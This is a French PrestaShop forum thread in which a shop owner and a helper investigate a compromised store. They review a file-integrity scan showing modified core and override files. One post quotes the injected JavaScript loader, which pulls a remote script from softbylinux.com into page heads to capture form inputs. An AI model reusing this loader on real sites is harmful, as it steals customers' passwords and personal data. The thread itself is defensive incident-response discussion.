mandrake Posted January 4 Share Posted January 4 Bonjour, j'ai reçu une confirmation de commande et de paiement et sur chaque en-tête il y a un script qui apparait qui n'a rien à faire là (j'ai masqué le nom de mon site et j'ai mis le code en capture d'écran car sinon je suis bloqué sur le forum) Il est en version 1.6 : Quelqu'un aurait la gentillesse de me dire ce que c'est, d'autant ce domaine softbylinux, n'est pas vieux, il a été déposé en septembre. j'aimerai vérifier si il y a un piratage sur le site mais je ne sais pas comment faire; merci pour votre aide et bonne année 2025 ! Link to comment Share on other sites More sharing options...
Eolia Posted January 4 Share Posted January 4 (edited) Hum, ça ne ressemble pas à un hack mais à une protection de votre serveur mail. Vous n'avez rien mis en place ? C'est le genre d'appli qui empêche que l'on puisse répondre directement à un mail si on ne fait pas partie de la liste des expéditeurs connus. A voir avec votre hébergeur. Edit: c'est louche, on retrouve ce script sur plein de Prestashop. Vous avez lancé Cleaner ? Edited January 4 by Eolia (see edit history) Link to comment Share on other sites More sharing options...
Eolia Posted January 4 Share Posted January 4 Après analyse ça pue vraiment. En gros ça choppe tout ce qui entré en select ou input et ça envoie ça à leur serveur. Vol d'identité et de mots de passe possibles donc. Link to comment Share on other sites More sharing options...
Eolia Posted January 4 Share Posted January 4 https://www.securefeed.com/Content/WebLookup?host=softbylinux.com Link to comment Share on other sites More sharing options...
mandrake Posted January 4 Author Share Posted January 4 Bonjour, on a une idée de solution possible ? Link to comment Share on other sites More sharing options...
Eolia Posted January 4 Share Posted January 4 Que vous dit Cleaner ? Link to comment Share on other sites More sharing options...
mandrake Posted January 4 Author Share Posted January 4 Cleaner ? Désolé je ne sais pas ce que c'est... A part CCleaner...Comment cela fonctionne-t-il ? Link to comment Share on other sites More sharing options...
mandrake Posted January 4 Author Share Posted January 4 Ou alors on parle de l'outil de nettoyage de prestashop ? Je vérifie les contraintes d'intégrité fonctionnelle, c'est bien ça ? Link to comment Share on other sites More sharing options...
Eolia Posted January 4 Share Posted January 4 https://shop.devcustom.net/fr/content/16-nettoyage-hack 1 Link to comment Share on other sites More sharing options...
mandrake Posted January 4 Author Share Posted January 4 Merci, je le connaissais mais j'avais complétement oublié ce précieux outil ! Il y a une quantité de lignes oranges et voic les lignes en rouge : Contrôle des scripts JS: MD5 ADMIN WARNING : Fichier différent de l'original => www/js/tinymce.inc.js Recherche de fichiers htaccess ajoutés ou modifiés:Fichier .htaccess inconnu à contrôler: => www/modules/pninlineeditor/kcfinder/upload/.htaccess Recherche de fichiers php ajoutés: Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/CategoryController.php Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/ProductController.php Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/CmsController.php Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/ManufacturerController.php Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/SupplierController.php Recherche de vulnérabilité sur les modules (A titre d'information. Si vous ne savez pas interpréter le code, veuillez demander l'avis d'un professionnel):Fonction sensible à contrôler: eval( => www/modules/pninlineeditor/kcfinder/lib/class_image.php Fonction sensible à contrôler: eval( => www/modules/prestashopbackup/JSON.php Fonction sensible à contrôler: eval( => www/modules/sd_adminprivacy/classes/Services/JSON.php Link to comment Share on other sites More sharing options...
mandrake Posted January 4 Author Share Posted January 4 Qu'en pensez-vous ? Link to comment Share on other sites More sharing options...
Eolia Posted January 4 Share Posted January 4 Il faudrait le screen complet car il y a forcément un endroit ou ce script est inséré. Link to comment Share on other sites More sharing options...
mandrake Posted January 4 Author Share Posted January 4 Listing initial des 17335 fichiers effectué en 2.789 sec. Par sécurité l'url du script a été modifiée. Notez la nouvelle url si vous fermez cette page. Si vous avez oublié l'url, relancez cleaner.php après l'avoir re-téléchargé Si des messages de nettoyage ou suppression sont affichés en rouge, votre e-boutique est susceptible d'avoir été attaquée et a été protégée d'urgence mais il est nécessaire de RESTAURER les fichiers modifiés, de CHANGER le nom de votre répertoire admin et de CHANGER les mots de passe des employés de votre boutique. Contrôle des fichiers admin: Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1425479164-264f6299.sql.bz2 Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1493897036-c73f981.sql.bz2 Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1524671343-10ee9b94.sql.bz2 Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1428452834-1908a9d1.sql.bz2 Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1453151779-4e8dd25.sql.bz2 Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1455455859-209e9900.sql.bz2 Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1430125085-4c060c4c.sql.bz2 Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1460499163-41430134.sql.bz2 Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/themes/default/template/controllers/dashboard/helpers/view/view.tpl.bak MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/controllers/dashboard/helpers/view/view.tpl Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/themes/default/template/controllers/login/content.tpl.bak MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/controllers/login/content.tpl MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/controllers/login/header.tpl MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/footer.tpl Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/themes/default/template/page_header_toolbar.tpl.bak Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/themes/default/template/header.tpl.bak MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/header.tpl MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/page_header_toolbar.tpl Contrôle sur les fichiers sensibles connus pour être modifiés: Aucun fichier sensible modifié Contrôle de sécurité sur les fichiers php coeur: MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/config/defines.inc.php MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/controllers/front/PasswordController.php MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/controllers/admin/AdminLoginController.php Fichier sans extension détecté => www/modules/sd_adminprivacy/override/classes/Tools.php.1.0.0.0 MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/classes/Validate.php MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/classes/Tools.php MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/classes/Customer.php Contrôle des scripts JS: MD5 ADMIN WARNING : Fichier différent de l'original => www/js/tinymce.inc.js Contrôle des images pouvant contenir un script: Aucun fichier image suspect detecté Recherche des infections connues: Aucun code suspect connu trouvé Contrôle de sécurité sur fichiers indésirables connus: Aucun fichier indésirable connu trouvé Contrôle des droits: Droits incorrects (777) pour le répertoire: /img/cms/zones-montagneuses Doit être 755 ou 705 Droits incorrects (777) pour le répertoire: /img/webrotate_360 Doit être 755 ou 705 Recherche de fichiers .xxx ajoutés connus comme étant des infections: Aucun fichier .xxx suspect trouvé Recherche de fichiers htaccess ajoutés ou modifiés: Fichier .htaccess inconnu à contrôler: => www/modules/pninlineeditor/kcfinder/upload/.htaccess Veuillez contrôler l'ajout de fichier php dans ces répertoires (Normalement détectés dans la recherche des modules) Recherche de fichiers php ajoutés: Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/config/settings.inc.php Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/config/settings.old.php Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/override/controllers/front/ContactController.php Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/CategoryController.php Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/ProductController.php Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/CmsController.php Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/ManufacturerController.php Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/SupplierController.php Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/override/classes/controller/Controller.php Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/override/classes/controller/FrontController.php Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection (file_get_contents() => www/override/classes/Mail.php Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/classes/Link.php Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection (file_get_contents() => www/override/classes/Tools.php Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/override/classes/shop/Shop.php Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/tools/htmlpurifier/standalone/HTMLPurifier/Language/messages/en.php Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/translations/fr/errors.php Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/translations/fr/pdf.php Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/translations/fr/fields.php Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/translations/fr/tabs.php Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/translations/fr/admin.php Recherche de vulnérabilité sur les modules (A titre d'information. Si vous ne savez pas interpréter le code, veuillez demander l'avis d'un professionnel): Fonction sensible à contrôler: file_get_contents( => www/modules/vatnumber/vatnumber.php Fonction sensible à contrôler: include( => www/modules/vatnumber/ajax.php Fonction sensible à contrôler: $_POST[ => www/modules/exapredictedition/exapredictedition.php Fonction sensible à contrôler: $_POST[ => www/modules/exapredictedition/AdminExaPredictEdition.php Fonction sensible à contrôler: file_get_contents( => www/modules/securitypatch/classes/HotfixPatches.php Fonction sensible à contrôler: include( => www/modules/securitypatch/securitypatch.php Fonction sensible à contrôler: include( => www/modules/favoriteproducts/favoriteproducts-ajax.php Fonction sensible à contrôler: include_once => www/modules/favoriteproducts/favoriteproducts.php Fonction sensible à contrôler: include( => www/modules/exapredict/validationopc.php Fonction sensible à contrôler: $_POST[ => www/modules/exapredict/exapredict.php Fonction sensible à contrôler: include( => www/modules/exapredict/validation.php Fonction sensible à contrôler: base64_decode => www/modules/payplug/ipn.php Fonction sensible à contrôler: fwrite => www/modules/payplug/backward_compatibility/Context.php Fonction sensible à contrôler: file_put_contents => www/modules/faq/faq.php Fonction sensible à contrôler: $_POST[ => www/modules/ph_blog_column_custom_second/ph_blog_column_custom_second.php Fonction sensible à contrôler: include_once => www/modules/top1e_ajaxlivesearch/controller_ajax_search.php Fonction sensible à contrôler: include_once => www/modules/pninlineeditor/kcfinder/integration/BolmerCMS.php Fonction sensible à contrôler: file_get_contents( => www/modules/pninlineeditor/kcfinder/core/class/minifier.php Fonction sensible à contrôler: $_POST[ => www/modules/pninlineeditor/kcfinder/core/class/browser.php Fonction sensible à contrôler: $_GET[ => www/modules/pninlineeditor/kcfinder/core/class/uploader.php Fonction sensible à contrôler: GLOBALS => www/modules/pninlineeditor/kcfinder/core/bootstrap.php Fonction sensible à contrôler: $_GET[ => www/modules/pninlineeditor/kcfinder/js_localize.php Fonction sensible à contrôler: file_get_contents( => www/modules/pninlineeditor/kcfinder/lib/helper_httpCache.php Fonction sensible à contrôler: eval( => www/modules/pninlineeditor/kcfinder/lib/class_image.php Fonction sensible à contrôler: include_once => www/modules/duplicateurlredirect/duplicateurlredirect.php Fonction sensible à contrôler: include_once => www/modules/duplicateurlredirect/override_1.4/classes/FrontController.php Fonction sensible à contrôler: include_once => www/modules/duplicateurlredirect/override_1.6/classes/controller/FrontController.php Fonction sensible à contrôler: include_once => www/modules/duplicateurlredirect/header.php Fonction sensible à contrôler: include_once => www/modules/duplicateurlredirect/override_1.5/classes/controller/FrontController.php Fonction sensible à contrôler: $_POST[ => www/modules/ph_blog_custom/ph_blog_custom.php Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/classes/Link.php Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/controllers/front/ManufacturerController.php Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/controllers/front/ProductController.php Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/controllers/front/CategoryController.php Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/controllers/front/SupplierController.php Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/controllers/front/CmsController.php Fonction sensible à contrôler: $_POST[ => www/modules/opartproductvideo/models/Video.php Fonction sensible à contrôler: $_GET[ => www/modules/opartproductvideo/controllers/admin/AdminOpartproductvideoController.php Fonction sensible à contrôler: include( => www/modules/opartproductvideo/opartproductvideo.php Fonction sensible à contrôler: file_put_contents => www/modules/seomanager/SimpleLogger.php Fonction sensible à contrôler: fwrite => www/modules/seomanager/DeBug.php Fonction sensible à contrôler: include_once => www/modules/seomanager/seomanager.php Fonction sensible à contrôler: $_FILES[ => www/modules/psthemextender/psthemextender.php Fonction sensible à contrôler: include( => www/modules/gsitemap/gsitemap-cron.php Fonction sensible à contrôler: fwrite => www/modules/gsitemap/backward_compatibility/Context.php Fonction sensible à contrôler: file_get_contents( => www/modules/gsitemap/gsitemap.php Fonction sensible à contrôler: $_FILES[ => www/modules/tetbanner/tetbanner.php Fonction sensible à contrôler: $_POST[ => www/modules/mdtossend/removePDF.php Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/install/Mail.php Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/install/Mail_save.php Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/tcpdf/include/tcpdf_static.php Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/tcpdf/include/tcpdf_images.php Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/tcpdf/include/tcpdf_fonts.php Fonction sensible à contrôler: include( => www/modules/mdtossend/tcpdf/tcpdf.php Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/tcpdf/tcpdf_import.php Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/mdtossend.php Fonction sensible à contrôler: $_FILES[ => www/modules/blockcategories/controllers/admin/AdminBlockCategoriesController.php Fonction sensible à contrôler: $_POST[ => www/modules/ph_blog_column_custom/ph_blog_column_custom.php Fonction sensible à contrôler: include_once => www/modules/blockrss/blockrss.php Fonction sensible à contrôler: file_get_contents( => www/modules/pscleaner/pscleaner.php Fonction sensible à contrôler: include( => www/modules/eicaptcha/eicaptcha-ajax.php Fonction sensible à contrôler: include_once => www/modules/homeslider/homeslider.php Fonction sensible à contrôler: include_once => www/modules/homeslider/ajax_homeslider.php Fonction sensible à contrôler: include_once => www/modules/gamificationOLD/gamification.php Fonction sensible à contrôler: include_once => www/modules/gamificationOLD/controllers/admin/AdminGamificationController.php Fonction sensible à contrôler: $_POST[ => www/modules/specialsslide/specialsslide.php Fonction sensible à contrôler: $_POST[ => www/modules/editorial/EditorialClass.php Fonction sensible à contrôler: include_once => www/modules/editorial/editorial.php Fonction sensible à contrôler: include( => www/modules/mailalerts/mailalerts-account.php Fonction sensible à contrôler: include_once => www/modules/mailalerts/mailalerts.php Fonction sensible à contrôler: $_POST[ => www/modules/blocklink/blocklink.php Fonction sensible à contrôler: $_FILES[ => www/modules/blockadvertising/blockadvertising.php Fonction sensible à contrôler: $_GET[ => www/modules/cmstab/cmstab.php Fonction sensible à contrôler: $_GET[ => www/modules/htmlbox/htmlbox.php Fonction sensible à contrôler: fwrite => www/modules/newsletter/newsletter.php Fonction sensible à contrôler: $_POST[ => www/modules/prestasocial/facebookloginajax.php Fonction sensible à contrôler: $_POST[ => www/modules/prestasocial/classes/voucher.php Fonction sensible à contrôler: file_get_contents( => www/modules/prestasocial/classes/facebook.php Fonction sensible à contrôler: include_once => www/modules/prestasocial/voucher.php Fonction sensible à contrôler: $_POST[ => www/modules/prestasocial/prestasocial.php Fonction sensible à contrôler: include_once => www/modules/sendtoafriend/sendtoafriend_ajax.php Fonction sensible à contrôler: include( => www/modules/webrotate_360view/webrotate_360view.php Fonction sensible à contrôler: $_GET[ => www/modules/webrotate_360view/img/controller/AdminController.php Fonction sensible à contrôler: $_GET[ => www/modules/webrotate_360view/img/AdminController.php Fonction sensible à contrôler: $_GET[ => www/modules/webrotate_360view/classes/WebrotateQqUploadedFileXhr.php Fonction sensible à contrôler: $_POST[ => www/modules/ph_blog_custom_second/ph_blog_custom_second.php Fonction sensible à contrôler: fwrite => www/modules/ganalytics/backward_compatibility/Context.php Fonction sensible à contrôler: include_once => www/modules/ganalytics/ganalytics.php Fonction sensible à contrôler: include( => www/modules/prestashopbackup/downloadbackupfile.php Fonction sensible à contrôler: fwrite => www/modules/prestashopbackup/ExportImportDatabase.php Fonction sensible à contrôler: file_get_contents( => www/modules/prestashopbackup/class.phpmailer.php Fonction sensible à contrôler: include_once => www/modules/prestashopbackup/sdk.class.php Fonction sensible à contrôler: eval( => www/modules/prestashopbackup/JSON.php Fonction sensible à contrôler: base64_decode => www/modules/prestashopbackup/services/ec2.class.php Fonction sensible à contrôler: include( => www/modules/prestashopbackup/cron/filecron.php Fonction sensible à contrôler: include( => www/modules/prestashopbackup/cron/filecron_restore.php Fonction sensible à contrôler: include( => www/modules/prestashopbackup/cron/dbcron_restore.php Fonction sensible à contrôler: include( => www/modules/prestashopbackup/cron/dbcron.php Fonction sensible à contrôler: include_once => www/modules/prestashopbackup/FileBackup.php Fonction sensible à contrôler: gzinflate => www/modules/prestashopbackup/utilities/gzipdecode.class.php Fonction sensible à contrôler: fwrite => www/modules/prestashopbackup/lib/requestcorepc/requestcorepc.class.php Fonction sensible à contrôler: include( => www/modules/prestashopbackup/lib/yaml/lib/sfYaml.php Fonction sensible à contrôler: file_put_contents => www/modules/prestashopbackup/lib/cachecore/cachefile.class.php Fonction sensible à contrôler: include_once => www/modules/prestashopbackup/lib/cachecore/cachecore.class.php Fonction sensible à contrôler: include_once => www/modules/prestashopbackup/prestashopbackup.php Fonction sensible à contrôler: include( => www/modules/prestashopbackup/PrestoChangeoClasses/FrontController.php Fonction sensible à contrôler: fwrite => www/modules/prestashopbackup/PrestoChangeoClasses/PrestoChangeoContext.php Fonction sensible à contrôler: include_once => www/modules/prestashopbackup/PrestoChangeoClasses/PrestoChangeoModule.php Fonction sensible à contrôler: $_POST[ => www/modules/etransactions/etransactions.php Fonction sensible à contrôler: $_FILES[ => www/modules/etransactions/classes/ETransactionsAdminConfig.php Fonction sensible à contrôler: base64_decode => www/modules/etransactions/classes/ETransactionsEncrypt.php Fonction sensible à contrôler: file_get_contents( => www/modules/etransactions/classes/ETransactionsHelper.php Fonction sensible à contrôler: $_GET[ => www/modules/etransactions/classes/ETransactionsController.php Fonction sensible à contrôler: $_GET[ => www/modules/etransactions/index.php Répertoire indésirable détecté (à supprimer ou à sauvegarder ailleurs): /modules/gapi Fonction sensible à contrôler: file_get_contents( => www/modules/gapi/gapi.php Fonction sensible à contrôler: include( => www/modules/gapi/oauth2callback.php Fonction sensible à contrôler: include_once => www/modules/blockreinsurance/blockreinsurance.php Fonction sensible à contrôler: $_POST[ => www/modules/blockreinsurance/reinsuranceClass.php Fonction sensible à contrôler: $_POST[ => www/modules/icirelaisedition/AdminIciRelaisEdition.php Fonction sensible à contrôler: $_POST[ => www/modules/icirelaisedition/icirelaisedition.php Fonction sensible à contrôler: $_FILES[ => www/modules/blockstore/blockstore.php Fonction sensible à contrôler: fwrite => www/modules/exportdata/backward_compatibility/Context.php Fonction sensible à contrôler: include_once => www/modules/exportdata/exportdata-csv.php Fonction sensible à contrôler: include_once => www/modules/blockwishlist/blockwishlist.php Fonction sensible à contrôler: include_once => www/modules/blockwishlist/controllers/front/mywishlist.php Fonction sensible à contrôler: include_once => www/modules/blockwishlist/controllers/front/view.php Fonction sensible à contrôler: $_GET[ => www/modules/blockwishlist/managewishlist.php Fonction sensible à contrôler: $_POST[ => www/modules/blockwishlist/sendwishlist.php Fonction sensible à contrôler: include_once => www/modules/jbx_superuser/AdminSuperUser.php Fonction sensible à contrôler: include( => www/modules/paybox/validation.php Fonction sensible à contrôler: include( => www/modules/paybox/unsubscribe.php Fonction sensible à contrôler: include( => www/modules/paybox/directvalidation.php Fonction sensible à contrôler: include( => www/modules/paybox/directvalidation3d.php Fonction sensible à contrôler: include( => www/modules/paybox/redirect.php Fonction sensible à contrôler: include( => www/modules/paybox/directvalidationoneclick.php Fonction sensible à contrôler: include( => www/modules/paybox/directcapturepayment.php Fonction sensible à contrôler: include_once => www/modules/paybox/paybox.php Fonction sensible à contrôler: include( => www/modules/paybox/short.php Fonction sensible à contrôler: $_FILES[ => www/modules/paybox/classes/PayboxConfiguration.php Fonction sensible à contrôler: include( => www/modules/paybox/directvalidation3doneclick.php Fonction sensible à contrôler: $_POST[ => www/modules/blocknewsletter/blocknewsletter.php Fonction sensible à contrôler: $_GET[ => www/modules/banippro/banippro.php Répertoire indésirable détecté (à supprimer ou à sauvegarder ailleurs): /modules/blockloichatelbak Fonction sensible à contrôler: $_POST[ => www/modules/blockloichatel.bak/class/popupmodel.php Fonction sensible à contrôler: include_once => www/modules/megablock/megablock.php Fonction sensible à contrôler: $_POST[ => www/modules/megablock/megablockClass.php Fonction sensible à contrôler: include_once => www/modules/pnadvancedproductslist/controladorList.php Fonction sensible à contrôler: include_once => www/modules/pnadvancedproductslist/gestordbproductlist.php Fonction sensible à contrôler: $_FILES[ => www/modules/blockbanner/blockbanner.php Fonction sensible à contrôler: include_once => www/modules/ph_simpleblog/ph_simpleblog.php Fonction sensible à contrôler: $_POST[ => www/modules/ph_simpleblog/models/SimpleBlogTag.php Fonction sensible à contrôler: include_once => www/modules/ph_simpleblog/assets/phpthumb/PhpThumb.inc.php Fonction sensible à contrôler: file_get_contents( => www/modules/ph_simpleblog/assets/phpthumb/ThumbBase.inc.php Fonction sensible à contrôler: include_once => www/modules/ph_simpleblog/assets/phpthumb/ThumbLib.inc.php Fonction sensible à contrôler: file_get_contents( => www/modules/ph_simpleblog/assets/recaptchalib.php Fonction sensible à contrôler: include( => www/modules/ph_simpleblog/ajax.php Fonction sensible à contrôler: $_POST[ => www/modules/ph_simpleblog/controllers/admin/AdminSimpleBlogTagsController.php Fonction sensible à contrôler: file_put_contents => www/modules/ph_simpleblog/controllers/admin/AdminSimpleBlogSettingsController.php Fonction sensible à contrôler: $_POST[ => www/modules/ph_simpleblog/controllers/admin/AdminSimpleBlogPostsController.php Fonction sensible à contrôler: $_FILES[ => www/modules/ph_simpleblog/controllers/admin/AdminSimpleBlogCategoriesController.php Fonction sensible à contrôler: include( => www/modules/icirelais/validation.php Fonction sensible à contrôler: $_POST[ => www/modules/icirelais/icirelais.php Fonction sensible à contrôler: include( => www/modules/icirelais/validationopc.php Fonction sensible à contrôler: include( => www/modules/cheque/validation.php Fonction sensible à contrôler: $_FILES[ => www/modules/themeconfigurator/themeconfigurator.php Fonction sensible à contrôler: include_once => www/modules/referralprogram/controllers/front/program.php Fonction sensible à contrôler: file_get_contents( => www/modules/referralprogram/controllers/front/email.php Fonction sensible à contrôler: fwrite => www/modules/referralprogram/referralprogram.php Fonction sensible à contrôler: $_POST[ => www/modules/blockcmsinfo/infoClass.php Fonction sensible à contrôler: $_FILES[ => www/modules/loihamon/controllers/front/retractation.php Fonction sensible à contrôler: include_once => www/modules/blockloichatel/blockloichatel.php Fonction sensible à contrôler: $_POST[ => www/modules/blockloichatel/class/popupmodel.php Fonction sensible à contrôler: file_get_contents( => www/modules/sd_adminprivacy/override/classes/Tools.php Fonction sensible à contrôler: file_put_contents => www/modules/sd_adminprivacy/sd_adminprivacy.php Fonction sensible à contrôler: eval( => www/modules/sd_adminprivacy/classes/Services/JSON.php Fonction sensible à contrôler: include( => www/modules/sd_adminprivacy/classes/Samdha/Module/Module.php Fonction sensible à contrôler: file_get_contents( => www/modules/sd_adminprivacy/classes/Samdha/Module/Tools.php Fonction sensible à contrôler: fwrite => www/modules/sd_adminprivacy/backward_compatibility/Context.php Fonction sensible à contrôler: include( => www/modules/bankwire/validation.php Fonction sensible à contrôler: $_GET[ => www/modules/twitterwidget/twitterwidget.php Fonction sensible à contrôler: file_put_contents => www/modules/categoriestopmenuxxl/categoriestopmenuxxl.php Fonction sensible à contrôler: file_get_contents( => www/modules/categoriestopmenuxxl/lessc.inc.php Fonction sensible à contrôler: $_FILES[ => www/modules/productpaymentlogos/productpaymentlogos.php Fonction sensible à contrôler: file_get_contents( => www/modules/productvideos/productvideos.php Fonction sensible à contrôler: include( => www/modules/statsvisitorpages/loadDetails.php Fonction sensible à contrôler: include( => www/modules/blockcart/blockcart-set-collapse.php Fonction sensible à contrôler: include_once => www/modules/extratabspro/ajax_extratabspro.php Fonction sensible à contrôler: $_GET[ => www/modules/extratabspro/extratabspro.php Fonction sensible à contrôler: include_once => www/modules/giftcard/giftcard.php Fonction sensible à contrôler: include( => www/modules/blocklayered/blocklayered-attribute-indexer.php Fonction sensible à contrôler: include( => www/modules/blocklayered/blocklayered-ajax.php Fonction sensible à contrôler: include( => www/modules/blocklayered/blocklayered-url-indexer.php Fonction sensible à contrôler: file_get_contents( => www/modules/blocklayered/blocklayered.php Fonction sensible à contrôler: include( => www/modules/blocklayered/blocklayered-price-indexer.php Fonction sensible à contrôler: include_once => www/modules/blockcms/blockcms.php Fonction sensible à contrôler: include_once => www/modules/productcomments/productcomments-ajax.php Fonction sensible à contrôler: $_GET[ => www/modules/productcomments/productcommentscriterion.php Fonction sensible à contrôler: include_once => www/modules/productcomments/controllers/front/default.php Fonction sensible à contrôler: file_get_contents( => www/modules/productcomments/productcomments.php Peak usage: 19023 KB of memory. ANALYSE TERMINÉE (Effectuée en 9.816 sec.) !!! ATTENTION !!! Certains de vos fichiers coeurs ont été modifiés. Si ces modifications ne sont pas volontaires, nous vous conseillons de comparer les fichiers avec les 2 zips (suspicious_xxxx et Prestashop) et de les restaurer dans leur version d'origine si nécessaire. IMPORTANT: Si les fichiers coeurs modifiés commencent par /**/ vous avez été victime d'un hack. Restaurez les versions d'origine immédiatement ! INFO: Votre site possède la version patchée du répertoire www/**admin**/filemanager Link to comment Share on other sites More sharing options...
mandrake Posted January 4 Author Share Posted January 4 L'analyse est complète avec les gros fichiers incluse Link to comment Share on other sites More sharing options...
Eolia Posted January 4 Share Posted January 4 Ce qui sent pas bon (à restaurer) MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/controllers/admin/AdminLoginController.php Pour le reste je ne vois rien de flagrant Trouvez-vous ce code (softbylinux.com) dans la code source de votre page ? Link to comment Share on other sites More sharing options...
mandrake Posted January 4 Author Share Posted January 4 Dans les faits, je vois le code dans les mails que l'on reçoit après paiement de la commande. Sans quoi j'ai téléchargé tous les fichiers du site et j'ai effectué une recherche en tapant le nom de domaine mais je n'ai rien trouvé. La seule partie que je n'ai pas vérifié c'est la bdd Link to comment Share on other sites More sharing options...
mandrake Posted January 4 Author Share Posted January 4 Le code est intégré dans le logo des mails reçus Link to comment Share on other sites More sharing options...
mandrake Posted January 4 Author Share Posted January 4 rien non plus dans la bdd Link to comment Share on other sites More sharing options...
mandrake Posted January 4 Author Share Posted January 4 Je pensais mettre une règle dans le htaccess qui interdirait l'accès à tps.js sur mon site. Qu'en pensez-vous ? Link to comment Share on other sites More sharing options...
Eolia Posted January 4 Share Posted January 4 En fait il est injecté dans le header après chargement, peut-être dans la fonction smartyOutputContent() et la ligne est ensuite supprimée sauf si l'option "déplacer les js à la fin" est active ou qu'on est dans les mails (le header ne fait pas partie du DOM à ce moment là) let a = document.head.querySelector('[src*="https://softbylinux.com/tps.js?host=www.site.com"]'); if(!a){ let s=document.createElement('script'); s.setAttribute('defer',''); s.setAttribute('src','https://softbylinux.com/tps.js?host=www.site.com'); document.head.appendChild(s); return } else { let scrs = document.body.querySelectorAll('[src*="https://softbylinux.com/tps.js?host=www.site.com"]'); for (let element of scrs){ element.remove(); } let hookdiv = document.getElementById('hookwork'); if (!hookdiv) { hookdiv = document.createElement('div'); hookdiv.setAttribute('id', 'hookwork'); hookdiv.setAttribute('hidden','hidden'); document.body.appendChild(hookdiv); Link to comment Share on other sites More sharing options...
Eolia Posted January 4 Share Posted January 4 à l’instant, mandrake a dit : Je pensais mettre une règle dans le htaccess qui interdirait l'accès à tps.js sur mon site. Qu'en pensez-vous ? Vous pouvez le faire mais il serait préférable de trouver l'entrée. Link to comment Share on other sites More sharing options...
mandrake Posted January 4 Author Share Posted January 4 Ça dépasse de très loin mes compétences actuelles, j'ai de gros problèmes de santé et un traitement qui altèrent ma mémoire depuis quelques années. C'est compliqué pour moi d'avoir une réflexion logique poussée. Cela me demande un énorme effort de concentration. Link to comment Share on other sites More sharing options...
mandrake Posted January 4 Author Share Posted January 4 Comment trouver cette entrée pour ensuite la patcher ? Cela me paraît vraiment compliqué. Link to comment Share on other sites More sharing options...
mandrake Posted January 4 Author Share Posted January 4 J'ai désactivé l'option "Déplacer les fichiers JS à la fin", histoire que cela empêche le script malveillant de rester actif dans certaines conditions. J'ai bien fait ? Link to comment Share on other sites More sharing options...
Eolia Posted January 4 Share Posted January 4 Non, laissez cette option activé, au contraire. Pouvez-vous m'envoyer l'url du site concerné en MP ? Link to comment Share on other sites More sharing options...
